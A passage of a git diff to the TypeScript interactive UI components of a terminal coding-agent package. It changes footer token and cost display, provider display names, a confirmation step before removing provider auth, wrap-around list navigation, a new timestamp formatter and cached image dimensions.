b/packages/pi-coding-agent/src/modes/interactive/components/branch-summary-message.ts index c7b666a2f..9c7ed9730 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/branch-summary-message.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/branch-summary-message.ts @@ -32,7 +32,7 @@ export class BranchSummaryMessageComponent extends Box { private updateDisplay(): void { this.clear(); - const label = theme.fg("customMessageLabel", `\x1b[1m[branch]\x1b[22m`); + const label = theme.fg("customMessageLabel", theme.bold("[branch]")); this.addChild(new Text(label, 0, 0)); this.addChild(new Spacer(1)); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/compaction-summary-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/compaction-summary-message.ts index ace738406..f7e68e259 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/compaction-summary-message.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/compaction-summary-message.ts @@ -33,7 +33,7 @@ export class CompactionSummaryMessageComponent extends Box { this.clear(); const tokenStr = this.message.tokensBefore.toLocaleString(); - const label = theme.fg("customMessageLabel", `\x1b[1m[compaction]\x1b[22m`); + const label = theme.fg("customMessageLabel", theme.bold("[compaction]")); this.addChild(new Text(label, 0, 0)); this.addChild(new Spacer(1)); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/config-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/config-selector.ts index 61f6d57dd..befee7ca6 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/config-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/config-selector.ts @@ -346,9 +346,14 @@ class ResourceList implements Component, Focusable { } } - // Scroll indicator + // Scroll indicator — count only selectable items (exclude group/subgroup headers) if (startIndex > 0 
|| endIndex < this.filteredItems.length) { - lines.push(theme.fg("dim", ` (${this.selectedIndex + 1}/${this.filteredItems.length})`)); + const selectableItems = this.filteredItems.filter((e) => e.type === "item"); + const selectableTotal = selectableItems.length; + const selectablePosition = selectableItems.findIndex( + (e) => this.filteredItems.indexOf(e) === this.selectedIndex, + ); + lines.push(theme.fg("dim", ` (${selectablePosition + 1}/${selectableTotal})`)); } return lines; diff --git a/packages/pi-coding-agent/src/modes/interactive/components/countdown-timer.ts b/packages/pi-coding-agent/src/modes/interactive/components/countdown-timer.ts index 0f051c2f6..ef77320d3 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/countdown-timer.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/countdown-timer.ts @@ -7,6 +7,7 @@ import type { TUI } from "@gsd/pi-tui"; export class CountdownTimer { private intervalId: ReturnType | undefined; private remainingSeconds: number; + private _disposed = false; constructor( timeoutMs: number, @@ -18,6 +19,7 @@ export class CountdownTimer { this.onTick(this.remainingSeconds); this.intervalId = setInterval(() => { + if (this._disposed) return; this.remainingSeconds--; this.onTick(this.remainingSeconds); this.tui?.requestRender(); @@ -30,6 +32,7 @@ export class CountdownTimer { } dispose(): void { + this._disposed = true; if (this.intervalId) { clearInterval(this.intervalId); this.intervalId = undefined; diff --git a/packages/pi-coding-agent/src/modes/interactive/components/custom-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/custom-message.ts index f3f6455fb..ba7cf9634 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/custom-message.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/custom-message.ts @@ -75,7 +75,7 @@ export class CustomMessageComponent extends Container { this.box.clear(); // Default rendering: label + content - const 
label = theme.fg("customMessageLabel", `\x1b[1m[${this.message.customType}]\x1b[22m`); + const label = theme.fg("customMessageLabel", theme.bold(`[${this.message.customType}]`)); this.box.addChild(new Text(label, 0, 0)); this.box.addChild(new Spacer(1)); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/daxnuts.ts b/packages/pi-coding-agent/src/modes/interactive/components/daxnuts.ts index e501cd435..47b87e146 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/daxnuts.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/daxnuts.ts @@ -4,7 +4,7 @@ * A heartfelt tribute to dax (@thdxr) for providing free Kimi K2.5 access via OpenCode. */ -import type { Component, TUI } from "@gsd/pi-tui"; +import { type Component, type TUI, visibleWidth } from "@gsd/pi-tui"; import { theme } from "../theme/theme.js"; // 32x32 RGB image of dax, hex encoded (3 bytes per pixel) @@ -101,7 +101,7 @@ export class DaxnutsComponent implements Component { const lines: string[] = []; const center = (s: string) => { - const visible = s.replace(/\x1b\[[0-9;]*m/g, "").length; + const visible = visibleWidth(s); const left = Math.max(0, Math.floor((width - visible) / 2)); return " ".repeat(left) + s; }; @@ -145,7 +145,8 @@ export class DaxnutsComponent implements Component { lines.push(""); if (textPhase > 2 || this.tick >= this.maxTicks) { lines.push(center(t.fg("dim", "Try OpenCode"))); - lines.push(center(t.fg("mdLink", "https://mistral.ai/news/mistral-vibe-2-0"))); + // URL replaced — the previous link pointed to an incorrect destination + lines.push(center(t.fg("mdLink", "opencode.ai"))); } else { lines.push(""); lines.push(""); } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/diff.ts b/packages/pi-coding-agent/src/modes/interactive/components/diff.ts index d575d63e3..55131b023 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/diff.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/diff.ts @@ 
-6,7 +6,7 @@ import { theme } from "../theme/theme.js"; * Format: "+123 content" or "-123 content" or " 123 content" or " ..." */ function parseDiffLine(line: string): { prefix: string; lineNum: string; content: string } | null { - const match = line.match(/^([+-\s])(\s*\d*)\s(.*)$/); + const match = line.match(/^([+\- ])(\s*\d*)\s(.*)$/); if (!match) return null; return { prefix: match[1], lineNum: match[2], content: match[3] }; } @@ -15,7 +15,7 @@ function parseDiffLine(line: string): { prefix: string; lineNum: string; content * Replace tabs with spaces for consistent rendering. */ function replaceTabs(text: string): string { - return text.replace(/\t/g, " "); + return text.replace(/\t/g, " "); } /** diff --git a/packages/pi-coding-agent/src/modes/interactive/components/dynamic-border.ts b/packages/pi-coding-agent/src/modes/interactive/components/dynamic-border.ts index 60d2da9e3..a54298065 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/dynamic-border.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/dynamic-border.ts @@ -11,7 +11,9 @@ import { theme } from "../theme/theme.js"; export class DynamicBorder implements Component { private color: (str: string) => string; - constructor(color: (str: string) => string = (str) => theme.fg("border", str)) { + constructor(color: (str: string) => string = (str) => { + try { return theme.fg("border", str); } catch { return str; } + }) { this.color = color; } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/extension-editor.ts b/packages/pi-coding-agent/src/modes/interactive/components/extension-editor.ts index f0a9eae8b..0b05c3ada 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/extension-editor.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/extension-editor.ts @@ -113,6 +113,9 @@ export class ExtensionEditorComponent extends Container implements Focusable { private openExternalEditor(): void { const editorCmd = 
process.env.VISUAL || process.env.EDITOR; if (!editorCmd) { + // No editor configured — nothing to do. + // The main interactive-mode handler shows a warning with an iTerm2 hint; + // this component is a secondary editor so we silently bail. return; } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/extension-input.ts b/packages/pi-coding-agent/src/modes/interactive/components/extension-input.ts index 06d7ee933..525bcfc06 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/extension-input.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/extension-input.ts @@ -74,6 +74,7 @@ export class ExtensionInputComponent extends Container implements Focusable { handleInput(keyData: string): void { const kb = getEditorKeybindings(); if (kb.matches(keyData, "selectConfirm") || keyData === "\n") { + if (this.input.getValue().trim() === "") return; this.onSubmitCallback(this.input.getValue()); } else if (kb.matches(keyData, "selectCancel")) { this.onCancelCallback(); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/extension-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/extension-selector.ts index 2870aed28..e24327fc8 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/extension-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/extension-selector.ts @@ -96,6 +96,10 @@ export class ExtensionSelectorComponent extends Container { if (idx < 0 || idx >= this.options.length) { return Math.max(0, Math.min(from, this.options.length - 1)); } + // If all items are separators, idx may still point to one — fall back to original index + if (this.isSeparator(idx)) { + return Math.max(0, Math.min(from, this.options.length - 1)); + } return idx; } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/footer.ts b/packages/pi-coding-agent/src/modes/interactive/components/footer.ts index 74842058e..3b28c0003 100644 --- 
a/packages/pi-coding-agent/src/modes/interactive/components/footer.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/footer.ts @@ -2,6 +2,7 @@ import { type Component, truncateToWidth, visibleWidth } from "@gsd/pi-tui"; import type { AgentSession } from "../../../core/agent-session.js"; import type { ReadonlyFooterDataProvider } from "../../../core/footer-data-provider.js"; import { theme } from "../theme/theme.js"; +import { providerDisplayName } from "./model-selector.js"; /** * Sanitize text for display in a single-line status. @@ -26,6 +27,18 @@ function formatTokens(count: number): string { return `${Math.round(count / 1000000)}M`; } +/** + * Format a cost value for compact display. + * Uses fewer decimal places for larger amounts. + * @internal Exported for testing only. + */ +export function formatPromptCost(cost: number): string { + if (cost < 0.001) return `$${cost.toFixed(4)}`; + if (cost < 0.01) return `$${cost.toFixed(3)}`; + if (cost < 1) return `$${cost.toFixed(3)}`; + return `$${cost.toFixed(2)}`; +} + /** * Footer component that shows pwd, token stats, and context usage. * Computes token/context stats from session, gets git branch and extension statuses from provider. @@ -68,10 +81,14 @@ export class FooterComponent implements Component { const totalCacheWrite = usageTotals.cacheWrite; const totalCost = usageTotals.cost; + // Use activeInferenceModel during streaming to show the model actually + // being used, not the configured model which may have been switched mid-turn. + const displayModel = state.activeInferenceModel ?? state.model; + // Calculate context usage from session (handles compaction correctly). // After compaction, tokens are unknown until the next LLM response. const contextUsage = this.session.getContextUsage(); - const contextWindow = contextUsage?.contextWindow ?? state.model?.contextWindow ?? 0; + const contextWindow = contextUsage?.contextWindow ?? displayModel?.contextWindow ?? 
0; const contextPercentValue = contextUsage?.percent ?? 0; const contextPercent = contextUsage?.percent !== null ? contextPercentValue.toFixed(1) : "?"; @@ -94,21 +111,36 @@ export class FooterComponent implements Component { pwd = `${pwd} • ${sessionName}`; } - // Build stats line - const statsParts = []; - if (totalInput) statsParts.push(`↑${formatTokens(totalInput)}`); - if (totalOutput) statsParts.push(`↓${formatTokens(totalOutput)}`); - if (totalCacheRead) statsParts.push(`R${formatTokens(totalCacheRead)}`); - if (totalCacheWrite) statsParts.push(`W${formatTokens(totalCacheWrite)}`); + // Build stats line as separate groups joined by a dim middle-dot separator + const sep = ` ${theme.fg("dim", "\u00B7")} `; - // Show cost with "(sub)" indicator if using OAuth subscription - const usingSubscription = state.model ? this.session.modelRegistry.isUsingOAuth(state.model) : false; + // Group 1: token I/O + const tokenGroup: string[] = []; + if (totalInput) tokenGroup.push(`↑${formatTokens(totalInput)}`); + if (totalOutput) tokenGroup.push(`↓${formatTokens(totalOutput)}`); + + // Group 2: cache metrics + const cacheGroup: string[] = []; + if (totalCacheRead) cacheGroup.push(`cr:${formatTokens(totalCacheRead)}`); + if (totalCacheWrite) cacheGroup.push(`cw:${formatTokens(totalCacheWrite)}`); + + // Group 3: cost + const costGroup: string[] = []; + const usingSubscription = displayModel ? this.session.modelRegistry.isUsingOAuth(displayModel) : false; if (totalCost || usingSubscription) { const costStr = `$${totalCost.toFixed(3)}${usingSubscription ? 
" (sub)" : ""}`; - statsParts.push(costStr); + costGroup.push(costStr); } - // Colorize context percentage based on usage + // Per-prompt cost annotation (opt-in via show_token_cost preference, #1515) + if (process.env.GSD_SHOW_TOKEN_COST === "1") { + const lastTurnCost = this.session.getLastTurnCost(); + if (lastTurnCost > 0) { + costGroup.push(`(last: ${formatPromptCost(lastTurnCost)})`); + } + } + + // Group 4: context percentage (colorized) let contextPercentStr: string; const autoIndicator = this.autoCompactEnabled ? " (auto)" : ""; const contextPercentDisplay = @@ -122,12 +154,19 @@ export class FooterComponent implements Component { } else { contextPercentStr = contextPercentDisplay; } - statsParts.push(contextPercentStr); - let statsLeft = statsParts.join(" "); + // Assemble groups: items within a group are space-separated, + // groups are separated by a dim middle-dot + const groups: string[] = []; + if (tokenGroup.length > 0) groups.push(tokenGroup.join(" ")); + if (cacheGroup.length > 0) groups.push(cacheGroup.join(" ")); + if (costGroup.length > 0) groups.push(costGroup.join(" ")); + groups.push(contextPercentStr); + + let statsLeft = groups.join(sep); // Add model name on the right side, plus thinking level if model supports it - const modelName = state.model?.id || "no-model"; + const modelName = displayModel?.id || "no-model"; let statsLeftWidth = visibleWidth(statsLeft); @@ -142,7 +181,7 @@ export class FooterComponent implements Component { // Add thinking level indicator if model supports reasoning let rightSideWithoutProvider = modelName; - if (state.model?.reasoning) { + if (displayModel?.reasoning) { const thinkingLevel = state.thinkingLevel || "off"; rightSideWithoutProvider = thinkingLevel === "off" ? 
`${modelName} • thinking off` : `${modelName} • ${thinkingLevel}`; @@ -150,8 +189,8 @@ export class FooterComponent implements Component { // Prepend the provider in parentheses if there are multiple providers and there's enough room let rightSide = rightSideWithoutProvider; - if (this.footerData.getAvailableProviderCount() > 1 && state.model) { - rightSide = `(${state.model!.provider}) ${rightSideWithoutProvider}`; + if (this.footerData.getAvailableProviderCount() > 1 && displayModel) { + rightSide = `(${providerDisplayName(displayModel.provider)}) ${rightSideWithoutProvider}`; if (statsLeftWidth + minPadding + visibleWidth(rightSide) > width) { // Too wide, fall back rightSide = rightSideWithoutProvider; @@ -197,8 +236,9 @@ export class FooterComponent implements Component { .sort(([a], [b]) => a.localeCompare(b)) .map(([, text]) => sanitizeStatusText(text)); const statusLine = sortedStatuses.join(" "); - // Truncate to terminal width with dim ellipsis for consistency with footer style - lines.push(truncateToWidth(statusLine, width, theme.fg("dim", "..."))); + // Match the rest of the footer styling: extension statuses should render + // in the same dim color as pwd/stats, with a dim ellipsis on truncation. + lines.push(truncateToWidth(theme.fg("dim", statusLine), width, theme.fg("dim", "..."))); } return lines; diff --git a/packages/pi-coding-agent/src/modes/interactive/components/model-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/model-selector.ts index c86347b6f..9f978ffdf 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/model-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/model-selector.ts @@ -15,6 +15,15 @@ import { theme } from "../theme/theme.js"; import { DynamicBorder } from "./dynamic-border.js"; import { keyHint } from "./keybinding-hints.js"; +/** Display names for providers in the model selector UI. 
*/ +const PROVIDER_DISPLAY_NAMES: Record<string, string> = { + anthropic: "anthropic-api", +}; + +export function providerDisplayName(provider: string): string { + return PROVIDER_DISPLAY_NAMES[provider] ?? provider; +} + function formatTokenCount(count: number): string { if (count >= 1_000_000) { const millions = count / 1_000_000; @@ -391,7 +400,7 @@ export class ModelSelectorComponent extends Container implements Focusable { const ctx = formatTokenCount(item.model.contextWindow); const ctxBadge = theme.fg("muted", `${ctx}`); - const providerBadge = theme.fg("muted", `[${item.provider}]`); + const providerBadge = theme.fg("muted", `[${providerDisplayName(item.provider)}]`); const checkmark = isCurrent ? theme.fg("success", " ✓") : ""; let line: string; @@ -447,7 +456,7 @@ export class ModelSelectorComponent extends Container implements Focusable { if (row.kind === "header") { // Provider group header — always unselectable - const providerLabel = theme.fg("borderAccent", row.provider); + const providerLabel = theme.fg("borderAccent", providerDisplayName(row.provider)); const count = theme.fg("muted", ` (${row.count})`); // Add blank line before header if not the very first visible row if (i > startIndex) { diff --git a/packages/pi-coding-agent/src/modes/interactive/components/oauth-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/oauth-selector.ts index 17844be07..33e23df94 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/oauth-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/oauth-selector.ts @@ -96,14 +96,14 @@ export class OAuthSelectorComponent extends Container { handleInput(keyData: string): void { const kb = getEditorKeybindings(); - // Up arrow + // Up arrow (wrap) if (kb.matches(keyData, "selectUp")) { - this.selectedIndex = Math.max(0, this.selectedIndex - 1); + this.selectedIndex = this.selectedIndex === 0 ? 
this.allProviders.length - 1 : this.selectedIndex - 1; this.updateList(); } - // Down arrow + // Down arrow (wrap) else if (kb.matches(keyData, "selectDown")) { - this.selectedIndex = Math.min(this.allProviders.length - 1, this.selectedIndex + 1); + this.selectedIndex = this.selectedIndex === this.allProviders.length - 1 ? 0 : this.selectedIndex + 1; this.updateList(); } // Enter diff --git a/packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts b/packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts index 5944d8c78..aac53ad80 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts @@ -13,7 +13,9 @@ import { } from "@gsd/pi-tui"; import type { AuthStorage } from "../../../core/auth-storage.js"; import { getDiscoverableProviders } from "../../../core/model-discovery.js"; +import { providerDisplayName } from "./model-selector.js"; import type { ModelRegistry } from "../../../core/model-registry.js"; +import { ModelsJsonWriter } from "../../../core/models-json-writer.js"; import { theme } from "../theme/theme.js"; import { rawKeyHint } from "./keybinding-hints.js"; @@ -39,8 +41,12 @@ export class ProviderManagerComponent extends Container implements Focusable { private tui: TUI; private authStorage: AuthStorage; private modelRegistry: ModelRegistry; + private modelsJsonWriter: ModelsJsonWriter; private onDone: () => void; private onDiscover: (provider: string) => void; + private onSetupAuth: (provider: string) => void; + private confirmingRemove = false; + private hintsContainer: Container; constructor( tui: TUI, @@ -48,26 +54,26 @@ export class ProviderManagerComponent extends Container implements Focusable { modelRegistry: ModelRegistry, onDone: () => void, onDiscover: (provider: string) => void, + onSetupAuth?: (provider: string) => void, ) { super(); this.tui = tui; this.authStorage = authStorage; 
this.modelRegistry = modelRegistry; + this.modelsJsonWriter = new ModelsJsonWriter(this.modelRegistry.modelsJsonPath); this.onDone = onDone; this.onDiscover = onDiscover; + this.onSetupAuth = onSetupAuth ?? (() => {}); // Header this.addChild(new Text(theme.fg("accent", "Provider Manager"), 0, 0)); this.addChild(new Spacer(1)); // Hints - const hints = [ - rawKeyHint("d", "discover"), - rawKeyHint("r", "remove auth"), - rawKeyHint("esc", "close"), - ].join(" "); - this.addChild(new Text(hints, 0, 0)); + this.hintsContainer = new Container(); + this.addChild(this.hintsContainer); + this.updateHints(); this.addChild(new Spacer(1)); // List @@ -102,6 +108,34 @@ export class ProviderManagerComponent extends Container implements Focusable { supportsDiscovery: discoverableSet.has(name), modelCount: providerModelCounts.get(name) ?? 0, })); + this.clampSelectedIndex(); + } + + private clampSelectedIndex(): void { + if (this.providers.length === 0) { + this.selectedIndex = 0; + return; + } + this.selectedIndex = Math.min(this.selectedIndex, this.providers.length - 1); + } + + private updateHints(): void { + this.hintsContainer.clear(); + if (this.confirmingRemove) { + const hints = [ + rawKeyHint("r", "confirm removal"), + rawKeyHint("esc", "cancel"), + ].join(" "); + this.hintsContainer.addChild(new Text(hints, 0, 0)); + } else { + const hints = [ + rawKeyHint("enter", "setup auth"), + rawKeyHint("d", "discover"), + rawKeyHint("r", "remove auth"), + rawKeyHint("esc", "close"), + ].join(" "); + this.hintsContainer.addChild(new Text(hints, 0, 0)); + } } private updateList(): void { @@ -116,7 +150,7 @@ export class ProviderManagerComponent extends Container implements Focusable { const countBadge = theme.fg("muted", `(${p.modelCount} models)`); const prefix = isSelected ? theme.fg("accent", "> ") : " "; - const nameText = isSelected ? theme.fg("accent", p.name) : p.name; + const nameText = isSelected ? 
theme.fg("accent", providerDisplayName(p.name)) : providerDisplayName(p.name); const parts = [prefix, nameText, " ", authBadge]; if (discoveryBadge) parts.push(" ", discoveryBadge); @@ -144,7 +178,13 @@ export class ProviderManagerComponent extends Container implements Focusable { this.updateList(); this.tui.requestRender(); } else if (kb.matches(keyData, "selectCancel")) { - this.onDone(); + if (this.confirmingRemove) { + this.confirmingRemove = false; + this.updateHints(); + this.tui.requestRender(); + } else { + this.onDone(); + } } else if (keyData === "d" || keyData === "D") { const provider = this.providers[this.selectedIndex]; if (provider?.supportsDiscovery) { @@ -153,10 +193,26 @@ export class ProviderManagerComponent extends Container implements Focusable { } else if (keyData === "r" || keyData === "R") { const provider = this.providers[this.selectedIndex]; if (provider?.hasAuth) { - this.authStorage.remove(provider.name); - this.loadProviders(); - this.updateList(); - this.tui.requestRender(); + if (this.confirmingRemove) { + this.confirmingRemove = false; + this.authStorage.remove(provider.name); + this.modelsJsonWriter.removeProvider(provider.name); + this.modelRegistry.refresh(); + this.loadProviders(); + this.updateHints(); + this.updateList(); + this.tui.requestRender(); + } else { + this.confirmingRemove = true; + this.updateHints(); + this.tui.requestRender(); + } + } + } else if (kb.matches(keyData, "selectConfirm")) { + // Enter key → initiate auth setup for the selected provider (#3579) + const provider = this.providers[this.selectedIndex]; + if (provider) { + this.onSetupAuth(provider.name); } } } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/scoped-models-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/scoped-models-selector.ts index 22f677540..2e1c9e41e 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/scoped-models-selector.ts +++ 
b/packages/pi-coding-agent/src/modes/interactive/components/scoped-models-selector.ts @@ -1,4 +1,5 @@ import type { Model } from "@gsd/pi-ai"; +import { providerDisplayName } from "./model-selector.js"; import { Container, type Focusable, @@ -204,7 +205,7 @@ export class ScopedModelsSelectorComponent extends Container implements Focusabl const isSelected = i === this.selectedIndex; const prefix = isSelected ? theme.fg("accent", "→ ") : " "; const modelText = isSelected ? theme.fg("accent", item.model.id) : item.model.id; - const providerBadge = theme.fg("muted", ` [${item.model.provider}]`); + const providerBadge = theme.fg("muted", ` [${providerDisplayName(item.model.provider)}]`); const status = allEnabled ? "" : item.enabled ? theme.fg("success", " ✓") : theme.fg("dim", " ✗"); this.listContainer.addChild(new Text(`${prefix}${modelText}${providerBadge}${status}`, 0, 0)); } @@ -318,14 +319,9 @@ export class ScopedModelsSelectorComponent extends Container implements Focusabl return; } - // Ctrl+C - clear search or cancel if empty + // Ctrl+C - always cancel immediately if (matchesKey(data, Key.ctrl("c"))) { - if (this.searchInput.getValue()) { - this.searchInput.setValue(""); - this.refresh(); - } else { - this.callbacks.onCancel(); - } + this.callbacks.onCancel(); return; } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/session-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/session-selector.ts index ff37698e0..ac08e7761 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/session-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/session-selector.ts @@ -570,13 +570,13 @@ class SessionList implements Component, Focusable { return; } - // Up arrow + // Up arrow (wrap) if (kb.matches(keyData, "selectUp")) { - this.selectedIndex = Math.max(0, this.selectedIndex - 1); + this.selectedIndex = this.selectedIndex === 0 ? 
this.filteredSessions.length - 1 : this.selectedIndex - 1; } - // Down arrow + // Down arrow (wrap) else if (kb.matches(keyData, "selectDown")) { - this.selectedIndex = Math.min(this.filteredSessions.length - 1, this.selectedIndex + 1); + this.selectedIndex = this.selectedIndex === this.filteredSessions.length - 1 ? 0 : this.selectedIndex + 1; } // Page up - jump up by maxVisible items else if (kb.matches(keyData, "selectPageUp")) { diff --git a/packages/pi-coding-agent/src/modes/interactive/components/settings-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/settings-selector.ts index 425154982..5b324af2c 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/settings-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/settings-selector.ts @@ -45,6 +45,7 @@ export interface SettingsConfig { respectGitignoreInPicker: boolean; quietStartup: boolean; clearOnShrink: boolean; + timestampFormat: "date-time-iso" | "date-time-us"; } export interface SettingsCallbacks { @@ -69,6 +70,7 @@ export interface SettingsCallbacks { onRespectGitignoreInPickerChange: (enabled: boolean) => void; onQuietStartupChange: (enabled: boolean) => void; onClearOnShrinkChange: (enabled: boolean) => void; + onTimestampFormatChange: (format: "date-time-iso" | "date-time-us") => void; onCancel: () => void; } @@ -355,6 +357,16 @@ export class SettingsSelectorComponent extends Container { values: ["true", "false"], }); + // Timestamp format (insert after respect-gitignore-in-picker) + const gitignoreIndex = items.findIndex((item) => item.id === "respect-gitignore-in-picker"); + items.splice(gitignoreIndex + 1, 0, { + id: "timestamp-format", + label: "Timestamp format", + description: "Date/time format for message timestamps", + currentValue: config.timestampFormat, + values: ["date-time-iso", "date-time-us"], + }); + // Add borders this.addChild(new DynamicBorder()); @@ -420,6 +432,9 @@ export class SettingsSelectorComponent extends 
Container { case "respect-gitignore-in-picker": callbacks.onRespectGitignoreInPickerChange(newValue === "true"); break; + case "timestamp-format": + callbacks.onTimestampFormatChange(newValue as "date-time-iso" | "date-time-us"); + break; } }, callbacks.onCancel, diff --git a/packages/pi-coding-agent/src/modes/interactive/components/skill-invocation-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/skill-invocation-message.ts index adbf71fd9..4e88f8eff 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/skill-invocation-message.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/skill-invocation-message.ts @@ -35,7 +35,7 @@ export class SkillInvocationMessageComponent extends Box { if (this.expanded) { // Expanded: label + skill name header + full content - const label = theme.fg("customMessageLabel", `\x1b[1m[skill]\x1b[22m`); + const label = theme.fg("customMessageLabel", theme.bold("[skill]")); this.addChild(new Text(label, 0, 0)); const header = `**${this.skillBlock.name}**\n\n`; this.addChild( @@ -46,7 +46,7 @@ export class SkillInvocationMessageComponent extends Box { } else { // Collapsed: single line - [skill] name (hint to expand) const line = - theme.fg("customMessageLabel", `\x1b[1m[skill]\x1b[22m `) + + theme.fg("customMessageLabel", theme.bold("[skill]") + " ") + theme.fg("customMessageText", this.skillBlock.name) + theme.fg("dim", ` (${editorKey("expandTools")} to expand)`); this.addChild(new Text(line, 0, 0)); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/timestamp.ts b/packages/pi-coding-agent/src/modes/interactive/components/timestamp.ts new file mode 100644 index 000000000..0380571ca --- /dev/null +++ b/packages/pi-coding-agent/src/modes/interactive/components/timestamp.ts @@ -0,0 +1,48 @@ +/** + * Timestamp formatting for message display. 
+ * + * Formats supported by TimestampFormat: + * - "date-time-iso": 2025-03-24 10:34 (default) + * - "date-time-us": 03-24-2025 10:34 AM + * Both formats render in the local timezone; the US format uses a + * 12-hour clock with AM/PM, the ISO format a 24-hour clock. + */ + +export type TimestampFormat = "date-time-iso" | "date-time-us"; + +function pad2(n: number): string { + return n.toString().padStart(2, "0"); +} + +function isoDate(d: Date): string { + return `${d.getFullYear()}-${pad2(d.getMonth() + 1)}-${pad2(d.getDate())}`; +} + +function isoTime(d: Date): string { + return `${pad2(d.getHours())}:${pad2(d.getMinutes())}`; +} + +function usDate(d: Date): string { + return `${pad2(d.getMonth() + 1)}-${pad2(d.getDate())}-${d.getFullYear()}`; +} + +function usTime(d: Date): string { + const hours = d.getHours(); + const period = hours >= 12 ? "PM" : "AM"; + const h = hours % 12 || 12; + return `${h}:${pad2(d.getMinutes())} ${period}`; +} + +/** + * Format a timestamp for message display using the specified format. + */ +export function formatTimestamp(timestamp: number, format: TimestampFormat = "date-time-iso"): string { + const d = new Date(timestamp); + + switch (format) { + case "date-time-iso": + return `${isoDate(d)} ${isoTime(d)}`; + case "date-time-us": + return `${usDate(d)} ${usTime(d)}`; + } +} diff --git a/packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts b/packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts index 80d25b0f0..1b1c547d9 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts @@ -3,6 +3,7 @@ import { Container, getCapabilities, Image, + type ImageDimensions, imageFallback, Spacer, Text, @@ -32,7 +33,7 @@ const WRITE_PARTIAL_FULL_HIGHLIGHT_LINES = 50; * Replace tabs with spaces for consistent rendering */ function replaceTabs(text: string): string { - return text.replace(/\t/g, " "); + return text.replace(/\t/g, " "); } /** @@ -88,6 +89,9 @@ export 
class ToolExecutionComponent extends Container { private editDiffArgsKey?: string; // Track which args the preview is for // Cached converted images for Kitty protocol (which requires PNG), keyed by index private convertedImages: Map = new Map(); + // Cached resolved image dimensions to avoid re-triggering async parsing + // when updateDisplay() recreates Image components (#3455). + private resolvedImageDimensions: Map<number, ImageDimensions> = new Map(); // Incremental syntax highlighting cache for write tool call args private writeHighlightCache?: WriteHighlightCache; // When true, this component intentionally renders no lines @@ -137,6 +141,15 @@ export class ToolExecutionComponent extends Container { return isBuiltInName && !hasCustomRenderers; } + dispose(): void { + this.convertedImages.clear(); + this.imageComponents = []; + this.imageSpacers = []; + this.editDiffPreview = undefined; + this.writeHighlightCache = undefined; + this.result = undefined; + } + updateArgs(args: any): void { this.args = args; if (this.toolName === "write" && this.isPartial) { @@ -472,16 +485,28 @@ export class ToolExecutionComponent extends Container { const spacer = new Spacer(1); this.addChild(spacer); this.imageSpacers.push(spacer); + // Pass cached dimensions to avoid re-triggering async parsing + // when updateDisplay() recreates Image components (#3455). + const cachedDims = this.resolvedImageDimensions.get(i); const imageComponent = new Image( imageData, imageMimeType, { fallbackColor: (s: string) => theme.fg("toolOutput", s) }, { maxWidthCells: 60 }, + cachedDims, ); - imageComponent.setOnDimensionsResolved(() => { - this.updateDisplay(); - this.ui.requestRender(); - }); + if (!cachedDims) { + const imgIdx = i; + imageComponent.setOnDimensionsResolved(() => { + // Cache resolved dimensions so future updateDisplay() calls + // don't re-trigger async parsing → infinite loop 